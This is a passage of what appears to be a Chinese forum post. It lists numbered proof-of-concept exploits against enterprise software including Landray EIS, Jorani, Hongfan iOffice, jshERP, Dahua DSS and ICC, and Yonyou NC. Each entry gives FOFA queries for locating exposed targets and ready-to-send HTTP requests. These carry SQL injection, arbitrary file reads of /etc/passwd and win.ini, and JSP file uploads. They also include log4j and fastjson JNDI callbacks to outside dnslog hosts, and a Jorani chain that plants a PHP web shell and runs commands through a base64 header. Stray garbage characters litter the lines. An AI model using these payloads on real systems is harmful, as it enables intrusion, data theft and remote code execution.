7 T2 E, i9 x. }3 V; eFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
+ _' ]7 ?% m" i& }GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1" C: E. Y% m4 P$ ~9 s. B# b
Host: 127.0.0.1! e# k; H0 e! G
Pragma: no-cache7 f( a* J) f7 A& V8 k2 k* s' O& G
Cache-Control: no-cache
, O: N# w9 E" E9 fUpgrade-Insecure-Requests: 1
# g! K& h. y% MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& k& H" ^( C7 E* ]5 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ d9 x* l9 F4 M+ R3 U" r2 g& E
Accept-Encoding: gzip, deflate
b4 v3 {; x$ F- p7 o+ R0 xAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ o+ O( @# K8 Q# a+ I/ i
Connection: close' l) u; p$ M$ X; I. b; V# A: T
% J `) O+ n" x1 y
/ T$ H8 Z/ U2 H5 o& \12. Jorani < 1.0.2 远程命令执行: w- U2 J7 b1 B% T z
FOFA:title="Jorani"0 }: |( w" i) x. w6 ^9 v7 L
第一步先拿到cookie0 y7 O( K2 F" j
GET /session/login HTTP/1.16 d' u: q7 `/ z% X. t* R* x% y
Host: 192.168.190.307 t" B6 |! q/ y4 P
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.360 a# F3 T" s6 S' Y
Connection: close$ e* E% w( ~9 {& T
Accept-Encoding: gzip* C0 ?5 _$ u O- r4 ^& g4 c
: A* x4 a( D6 n }" M
! h9 ~9 H* q. `' k( K响应中csrf_cookie_jorani用于后续请求9 w/ T# X9 [( N8 l: M
HTTP/1.1 200 OK
[& f0 p* g! _3 E, m/ J/ V! ?, oConnection: close
# x4 ^1 C9 v1 B8 n/ ~ SCache-Control: no-store, no-cache, must-revalidate
# h. u& c. Y8 e5 {- B2 kContent-Type: text/html; charset=UTF-84 J; D" W9 s" X4 Y! o8 P
Date: Tue, 24 Oct 2023 09:34:28 GMT {* P8 @3 T( h
Expires: Thu, 19 Nov 1981 08:52:00 GMT. D/ n: @, a' G: Z0 n( W6 s
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
6 }! L* \. K; c9 ]; P0 C& VPragma: no-cache
8 `2 `4 V6 s9 q0 r& \# vServer: Apache/2.4.54 (Debian)
, b/ i; O+ U$ D/ e. s- i! XSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
6 c8 c( S- n0 S l3 G1 RSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
* u9 d. v6 P0 g- BVary: Accept-Encoding
6 y" ]4 q j" y5 \3 I7 q: x, V" q$ I8 z* W( E8 N5 u: n
! i- I z5 C% Z' W; rPOST请求,执行函数并进行base64编码
6 K& Z* s6 u# l3 mPOST /session/login HTTP/1.1
- r3 O5 r d% W z# M1 j1 eHost: 192.168.190.304 L6 F9 V0 l5 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& T- t @% k; N7 a) a8 I
Connection: close3 k2 Z7 [. ?0 f* X! `: U
Content-Length: 252
8 w4 N2 n# K$ b+ KContent-Type: application/x-www-form-urlencoded
/ r/ c' s* O9 w1 ?# HCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ t! x) S$ a9 Y9 L: K. L8 S$ q
Accept-Encoding: gzip' v t1 i( f. u/ J' N1 e
, ~* W, d2 I6 X! m; Scsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor6 i- b# X3 q) W2 p( x
2 d& ?) I6 C0 R" @& Y! h) k/ W- F/ i) A& a; b2 N+ o* |/ P' }1 ?
, p0 L* _3 S" }
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
+ [" A! J5 E& E/ N1 J* c3 f( eGET /pages/view/log-2023-10-24 HTTP/1.1
Z$ {$ N" A3 Q5 fHost: 192.168.190.30
3 S+ U0 L( i, F8 M/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* I: P7 r! u# E: ~1 _. T0 a
Connection: close' d% _/ T- j8 @" `) {
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
0 g$ q b: z+ M8 T$ Y* _K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=! t2 r: |7 O- g1 J* l" k, q
X-REQUESTED-WITH: XMLHttpRequest
3 y9 M! h6 b* H- ^& j/ IAccept-Encoding: gzip# |0 P: ]$ d- a2 Y4 D8 G" g+ p
- V% B9 S) \4 ?& Y
7 Q0 S( w: A6 C: B0 E6 v13. 红帆iOffice ioFileDown任意文件读取 n/ b) ^0 O% i+ S' P# x
FOFA:app="红帆-ioffice"2 E% T2 r, K; H! v- ^1 d* L% a
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1) Y0 Z! @! N5 k; E& `+ M7 Z
Host: x.x.x.x8 E3 y9 n/ h* Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 S( T1 l( L1 S# P8 m3 H& LConnection: close: ]; I; b8 }6 F' j7 y' h( k: f ~3 G
Accept: */*9 O: M8 |* v7 e/ P4 }' \
Accept-Encoding: gzip
, O. X# U* e8 h' K( U* r2 z5 n
3 Q, ?0 h4 s, r( b; M/ M: R9 M R. B# t! D- O( h
14. 华夏ERP(jshERP)敏感信息泄露
4 ?. M# f! ]- x2 x, r. OFOFA:body="jshERP-boot"
) \! \: C# U4 s7 c2 ^! o泄露内容包括用户名密码
F& J O0 d7 `+ dGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+ b+ v, \% J0 s7 j- Z* D: T1 WHost: x.x.x.x) r$ c( p9 q2 K" U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) C2 M) \, Z W1 O' R' H5 G5 t- u) @Connection: close1 c, e, N' `) f1 u) v
Accept: */*0 w& \( d1 y6 [7 m! ]
Accept-Language: en
, H! ]: b* k) g$ K1 V' L) UAccept-Encoding: gzip
9 ~: _: X6 r1 X
; b- B* {1 N3 r/ Y
( z# q. s& m. a15. 华夏ERP getAllList信息泄露
0 d% }3 [4 r( O$ f: X9 L4 ECVE-2024-0490
5 o" Z" u* i/ W" ~9 r0 cFOFA:body="jshERP-boot"
) P9 G8 S$ V! p5 e# {泄露内容包括用户名密码& N# Z+ S1 [ X3 n- a; g E7 J
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
/ p7 o5 u. J+ g5 f1 D& hHost: 192.168.40.130:100- c8 h- D1 M4 n' x1 {9 ^- @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
4 c6 q) t, O! K* {" @' u$ uConnection: close
& x4 |( s4 o/ ]- o2 `Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 L$ Y5 H/ I: K0 S$ wAccept-Language: en5 q8 ]# ^9 ~7 k" }8 f4 y
sec-ch-ua-platform: Windows$ c' F6 J$ Q1 a2 Y6 A
Accept-Encoding: gzip* `( V% y5 f% Q& t* R6 V9 i
0 S/ i) U K' }$ E* X) ?' W6 l* D( q+ T4 y
16. 红帆HFOffice医微云SQL注入' J3 i/ ^ l+ \' [3 V$ g. T
FOFA:title="HFOffice"
! g/ n3 H3 F0 ]/ F. a1 hpoc中调用函数计算1234的md5值- Z3 F; M+ m, Y4 W9 n7 H
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1/ t8 N5 k+ R. E c5 ] L+ y/ I
Host: x.x.x.x
~3 y% \3 E, b$ a4 j4 yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
$ o7 @" d4 `5 b, d: [Connection: close
0 g t: C3 \6 @9 OAccept: */*: e2 Y% I5 H: @4 Q: c& R5 t2 R
Accept-Language: en5 X, @2 T$ w4 L. m% P$ A
Accept-Encoding: gzip* @+ O/ R4 W( ~% D1 c
- Z' w6 @0 b& t- Q* \: x2 V) V U' H
17. 大华 DSS itcBulletin SQL 注入
- s9 H8 [/ F! l* y$ d4 j* y1 F$ fFOFA:app="dahua-DSS"1 k& G# |0 Q& I6 v$ @$ [5 J
POST /portal/services/itcBulletin?wsdl HTTP/1.1& Z$ M- p4 t+ h# `7 u
Host: x.x.x.x
" l" w' M! O% A2 l, dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 M2 P9 Y0 p4 D' i1 oConnection: close
" n0 ^% D! ?5 C) `) I* ?3 XContent-Length: 345& a2 ]* {% s! ]" c: A" N9 R) u
Accept-Encoding: gzip; D8 C! s. `/ c2 Q3 b* G$ P
; J, C/ G" v, V) {) @( o<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
8 \, n9 M6 t; R6 {+ k<s11:Body>
; c4 ~4 O3 q1 D( u! ] <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>( L1 b) T+ t" x% R
<netMarkings>
# O( z: M' C& _# j- N3 g (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1, ~/ B, V+ c6 n u7 o
</netMarkings>
+ r9 Q1 ], k! Z# e% D/ m& h* o </ns1:deleteBulletin>
$ ~& L4 q7 W$ M. ` </s11:Body>- ~. z# \2 \0 y) s; J6 }: ?
</s11:Envelope>9 G) J- O) ^6 N4 ?% v
6 f% G( }, G8 S
" L5 C: E* I! U3 h/ c18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ x$ b6 a% k/ q8 C, p8 K R
FOFA:app="dahua-DSS". a4 g( g( b# |. [& I
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.19 b7 c/ V( C% R1 ?! i4 f% J
Host: your-ip
5 @9 P9 n+ G" Y+ Y. o: ?+ J, y- b2 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, T( j3 `) ~, H- \4 P! f' @
Accept-Encoding: gzip, deflate
$ d% h" H( l1 L* h) H! V6 gAccept: */*
" H! k& T! ^4 W# ]2 V+ mConnection: keep-alive
' E/ m3 C! M% N0 F8 n0 a
6 n' p: u( @+ ^1 J) Z; n8 g
: s; i, H% j! \% b( W6 p
7 K. G* M1 Z3 l8 v7 ^1 p* G19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 m! Q# [" F# y2 h' m7 G- t# BFOFA:app="dahua-DSS"
- S% O4 q! y9 @1 X3 UGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1" P' c8 J3 I: g# G8 z4 O2 `# I
Host:
e M7 {0 i3 r* Q" zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" [; }( Y. S8 [7 i+ ]1 {Accept-Encoding: gzip, deflate# W7 E0 A% z3 d- t1 I4 s9 |
Accept: */*, h, Z$ T; J) r( G' I9 Y
Connection: keep-alive. [; T& ~! D1 M Z4 g- b/ Y
1 \! K% }/ @9 I
+ a. H/ ^7 G/ b/ H5 T20. 大华ICC智能物联综合管理平台任意文件读取
7 Q# b& I* c0 xFOFA:body="*客户端会小于800*"
; h8 S% [% P. v2 }) NGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
, e. F3 I. C# Q- y" YHost: x.x.x.x
' p# a" a9 x- ?4 w/ hUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; X- x/ i& T3 Z# ]. S
Connection: close
; R5 ^+ j0 z* J; X$ bAccept: */*/ Q5 S2 g' C) c* B3 l: a* ]
Accept-Language: en
8 u6 W i. L5 K) i' d8 A JAccept-Encoding: gzip
6 {1 Z H. v5 P9 V: x+ f; m0 _5 `: i7 D5 |. X
2 I7 a' r1 ]+ S
21. 大华ICC智能物联综合管理平台random远程代码执行" [: R& U$ E y/ D5 ?3 V& y. }
FOFA:icon_hash="-1935899595"
' q5 E; |% N! YPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 n) b, I8 J7 n/ DHost: x.x.x.x; j( w: F t/ t2 B* I- |' [) H, `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% q4 Z+ q9 V! S7 y5 I A: R
Content-Length: 161
. o% a; C! v- I" r2 pAccept-Encoding: gzip8 u: ^- O( h5 g2 p) [
Connection: close
2 H- c6 @/ C, R H( eContent-Type: application/json;charset=utf-8' C' U( g: i- Z& ]) y
' n. l6 t( K. i& m# A1 s5 p{
/ N" o; v" d: ~7 S4 P8 A"a":{# M8 k1 u0 b( w" I1 y
"@type":"com.alibaba.fastjson.JSONObject",
! E2 q+ X' _5 C, M* t* L5 \7 g {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
1 A/ u% @7 m0 z/ Q( V! \ }""
9 y+ n6 Y$ w4 w( i9 u}
+ u( ]; [3 j$ V0 d. }
% i j- `! Y& c! [1 H, g+ h2 K/ v
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
5 T; O; L- U+ TFOFA:icon_hash="-1935899595"7 i6 h7 n+ ~- W. e
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! ^1 x; [, ~; _5 q; I
Host: your-ip
& J. L: b& g& A3 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 W; V q3 f$ Z$ c" V; F8 D5 @
Content-Type: application/json;charset=utf-8
$ ?5 m; Y0 E) \% l
* X+ ~; S8 ~' a: Q2 k( K6 U G: G: J$ ^{
( ^: Y- `0 c6 ?4 z3 \: e"loginName":"${jndi:ldap://dnslog}"
7 k# r/ u* Z3 ] L}" f, X. X* F/ _6 F; O1 e" L: h2 ~
! Z/ n$ z3 p; r! \1 u7 D) S( y3 K/ m" e) `. }4 g
& Y8 A" _ |/ i( y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 [- H0 v6 h. Y- b% f
FOFA:icon_hash="-1935899595") Z# ^6 C' f: h
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* f" r( i2 d! Z9 K# @2 mHost: your-ip
) r- b1 j( r) EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( v1 \; m& h$ _8 s. y
Content-Type: application/json;charset=utf-8( I3 d+ E/ H% R, v2 _( p7 r
Accept-Encoding: gzip' n7 Q/ o$ W; M- B
Connection: close2 ?6 o5 z. y3 H' O! L
+ p( c" q; ]; |2 {, u" ~{% D# c; ^' Y* X6 {9 d, Y
"a":{9 {) o) B8 p0 a7 N$ } U
"@type":"com.alibaba.fastjson.JSONObject",& B$ ^7 K8 }% W5 x: v
{"@type":"java.net.URL","val":"http://DNSLOG"}
& ~7 x0 F- J0 V }""3 ]- G" n: V# h- h. c5 g
}" m6 O6 K% @5 g6 z; V% c0 D. Q
6 a0 _; w/ C, q! {# T# Z* a$ r2 l2 K- ^* x1 E) k8 }
24. 用友NC 6.5 accept.jsp任意文件上传& `3 V Z# w3 Z. f" s8 H
FOFA:icon_hash="1085941792"
/ f0 L2 Q) V' ]POST /aim/equipmap/accept.jsp HTTP/1.1
% G& m: J& f8 q1 i7 y, N2 XHost: x.x.x.x- u! k1 U2 ?' {! ]7 z) Y
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
0 ^" m: s3 [8 wConnection: close- S/ w: b8 D8 e5 k; Y8 \
Content-Length: 449
7 E' p+ [+ z9 P" J" T- @6 nAccept: */*
5 V. k' ~( V t3 W, T( @7 U, H, EAccept-Encoding: gzip
! Z( I% T7 D$ J+ k, ?9 e- fContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc( Z( S F& H6 \6 [& v$ G& s( _" P
9 O ]3 V' j+ U3 ~$ q% r
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* S0 s3 c4 ~( e9 y }3 G! \
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
. Y2 U: S! O f, v7 N$ t$ m& h; gContent-Type: text/plain9 A5 m6 y" y4 f* ^, F
- Y4 F5 v' G) j3 j9 t, c, Q<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
, S$ M. c' B- z, L2 M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
, \! J) |' h; u% T/ @Content-Disposition: form-data; name="fname"
3 H0 k% A3 o1 x5 I- C
9 m7 b* Q& q% U+ L6 y; L\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
0 T$ k& E# [2 u1 u/ s' w-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--# }# v. j5 @" v
9 e& T* u3 f0 l
, a) M# q% P% _! y7 S3 A25. 用友NC registerServlet JNDI 远程代码执行
+ Z! O l. U% o) _8 j5 cFOFA:app="用友-UFIDA-NC"
1 y- ~9 p$ H0 v* ePOST /portal/registerServlet HTTP/1.11 |4 {9 p/ [% Y
Host: your-ip
/ b+ ^/ R/ H: `# C$ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.01 W8 x4 t" J; v( K( \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
" e) Y5 H/ { r* p) H( F& O4 DAccept-Encoding: gzip, deflate
% t: z7 H) ~5 U: @; l# y8 rAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.63 Q, }, M% _+ r2 I: C
Content-Type: application/x-www-form-urlencoded' `+ Q/ h; L( E1 B, [- d7 H, O
5 ?8 }! }+ T9 a. k1 ltype=1&dsname=ldap://dnslog( q1 G2 d4 \& o/ {7 \
( v1 h) G8 s+ q4 q+ Z; n
$ U' N- {2 d; S/ ~8 ~0 r+ |: _# o0 k8 P% V
26. 用友NC linkVoucher SQL注入' O* T3 n5 H) `3 P
FOFA:app="用友-UFIDA-NC"
6 H7 o/ H/ ~2 Z. x& pGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
! A* p* {# X/ L, p( x+ e. ]( qHost: your-ip
* B0 R+ n) A; n+ q( C% ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- `& J8 K3 f8 }! AContent-Type: application/x-www-form-urlencoded
$ j/ g# A6 l3 f' xAccept-Encoding: gzip, deflate
+ r% A" T( l5 Z2 Q: V$ f9 i5 fAccept: */*
& E6 Q" Y3 g$ RConnection: keep-alive
! G9 W7 o3 h4 R+ D2 P- P u% ? N" n
/ @& T% n2 ]1 J9 D+ e3 X27. 用友 NC showcontent SQL注入
; |4 w7 s( u3 w% _FOFA:icon_hash="1085941792", S0 y$ a$ X m- M' W r' F+ P6 x
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1$ M0 y2 u7 }- {6 X
Host: your-ip
4 [) T+ s! n% lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' E7 a1 f* v! H( a. ~
Accept-Encoding: identity8 i/ ?0 {) U: r
Connection: close
' I* N0 _/ W0 t" Q- v- QContent-Type: text/xml; charset=utf-8
8 N7 O! ]3 M8 K. b- L$ m7 x u D& c H3 x! Q
& M5 `( M# y5 {$ w8 m3 A
28. 用友NC grouptemplet 任意文件上传
, r5 V7 M6 V8 r/ @FOFA:icon_hash="1085941792"
4 O* x4 t) m7 N6 Y- LPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
9 w4 Y7 H% U. B3 AHost: x.x.x.x8 R1 c- i9 }* P$ J" b. ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36! o% ?& I) x, h& [' t% `0 u, g$ k
Connection: close
8 {. j) f* |% h2 M, LContent-Length: 268
7 ?! ^ e! A9 C6 ]- M) gContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk4 F4 ~0 u) n5 d9 z; N
Accept-Encoding: gzip) s& q6 ]) i) k) A" ]- m% R
2 d. J* w; b1 J! Q# s
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% I: H) x& U/ b/ s% `& fContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
% {: b3 v7 w1 u3 Q& I, {5 g P- GContent-Type: application/octet-stream
' l+ h0 y. p* W: i1 B1 `1 z0 B; @ k6 D" V5 q$ f3 u! C+ y4 F# l
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
8 _4 U2 j' W' R------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--$ m a* }$ N+ t: N' I
) o" i5 {% n9 \# `, A% _; X+ O: j
* m0 Q; A0 r7 w5 Q: J/ E/uapim/static/pages/nc/head.jsp' k& `& M _, S! |+ f2 I; K# Y
5 X% W( N6 {3 T
29. 用友NC down/bill SQL注入
5 f/ u0 x0 ]& @/ C( mFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' {/ z4 u" |) a% A# ?
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1( e6 |' k% R, x* M+ A
Host: your-ip, L3 ]+ T7 P3 H( s9 B2 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 O) L/ ?# S: J- w( y, [ t
Content-Type: application/x-www-form-urlencoded
6 i0 F8 o1 {) u+ k sAccept-Encoding: gzip, deflate; `4 q/ P3 L+ \/ {3 b
Accept: */*
$ x7 w" W$ o( r+ u. lConnection: keep-alive
6 q4 ~) H d) F8 [- E
) J. t5 y# x, n, U5 M3 \+ Q
) x9 D, A) f1 L$ O0 _30. 用友NC importPml SQL注入
9 x, J% b2 K8 [FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
# n! T2 K1 _) n! x4 ?/ s5 SPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
) v! f# Y& _- W) R+ P7 l$ VHost: your-ip
O9 e. N% I, j& b- fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
7 G; R4 }, @' ]. A/ z2 N# z3 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ B4 Y3 ]2 J: KConnection: close
! i) \9 c+ F% A+ w
5 H( q; D8 d c( N------WebKitFormBoundaryH970hbttBhoCyj9V
4 @) E* w5 @6 {: uContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
: U6 `! e( C6 `6 m: l/ m# a0 OContent-Type: image/jpeg9 k5 J0 @+ f2 u- X7 Q$ d# [
------WebKitFormBoundaryH970hbttBhoCyj9V--
% N# D4 Z% G: I0 o
% N9 S9 {0 B" S- d0 q; @3 I& }5 J/ A# ]% |: }
31. 用友NC runStateServlet SQL注入2 \: p( H. [8 P/ I
version<=6.5
* s, o" Y7 G5 M7 m$ YFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 J4 h' w f% }. @3 m/ R: ~2 IGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: V( t; G, e. t8 l; ]5 {' EHost: host
4 i, x0 |' H) G3 C9 J( o. S( OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; T- K7 ]. r; q8 f4 u3 DContent-Type: application/x-www-form-urlencoded3 |4 I8 j7 ]& Z5 B, ^
2 h+ n' [' O+ Z5 U& r$ v
( V) I. X3 g3 m' [
32. 用友NC complainbilldetail SQL注入$ A6 z+ L$ G( r; j
version= NC633、NC65
. |7 f% x4 ]- G0 Y/ F$ u6 N; KFOFA:app="用友-UFIDA-NC"
) ]* S( ~) i$ K3 e! dGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 w/ n3 O, W- i# O# z* A3 YHost: your-ip& V4 O7 d# z5 @0 u! s) ?7 b: O6 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ] ?; n$ \" u; ]) P# |- I
Content-Type: application/x-www-form-urlencoded1 d: x/ d, r9 `3 x/ s& Z1 Q) o# z
Accept-Encoding: gzip, deflate {+ A$ K' l$ D$ {
Accept: */*
, ~* g( H W" UConnection: keep-alive( c7 Y3 Q! r+ }' H5 I
) c' J' \! w& Q @8 H
0 D. `. z. ]1 a9 ?3 D6 h* w
33. 用友NC downTax/download SQL注入1 z; s) J' e, G$ e
version:NC6.5FOFA:app="用友-UFIDA-NC"
& h3 S9 B! P$ k& ~, Q& {- J3 a& E- SGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ J) |+ a$ K8 M( I9 s0 h! N3 h9 G, P
Host: your-ip
) d2 [2 O1 n9 ~: vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 Q; r9 d; w# ^) l$ h
Content-Type: application/x-www-form-urlencoded
/ W# G, |* l7 P S- I3 ?8 Q/ Q; x% jAccept-Encoding: gzip, deflate
2 p S! p& n! @Accept: */*
5 m9 n) [4 O: c: n6 ?- |1 MConnection: keep-alive/ A" o7 }6 o$ P
$ |, l! A8 }9 [1 J2 P
9 W& E% ^3 v3 h! g( @5 ~34. 用友NC warningDetailInfo接口SQL注入
7 g- c0 A \% X: CFOFA:app="用友-UFIDA-NC"! m* y: j9 Q* n+ K% t
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1! N4 y" ?4 Y, W4 A
Host: your-ip
" F8 L! G. P! d' A; UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! A3 n" {- i+ K" h- [- @8 oContent-Type: application/x-www-form-urlencoded
/ P& N% u# ?( IAccept-Encoding: gzip, deflate4 }& g d0 r& u6 K6 k
Accept: */*
! _4 D. ~$ |& Z, j ^Connection: keep-alive
- V1 ~- e% }, D/ W2 V
& Z" | X% \- k S, h! Q1 ?6 Q3 f, @% s+ u2 H% R' c, [
35. 用友NC-Cloud importhttpscer任意文件上传
6 C- ?9 Q( W; c: y6 j4 n* M. HFOFA:app="用友-NC-Cloud"% k( i4 O& h' }/ B( r' n; j7 x
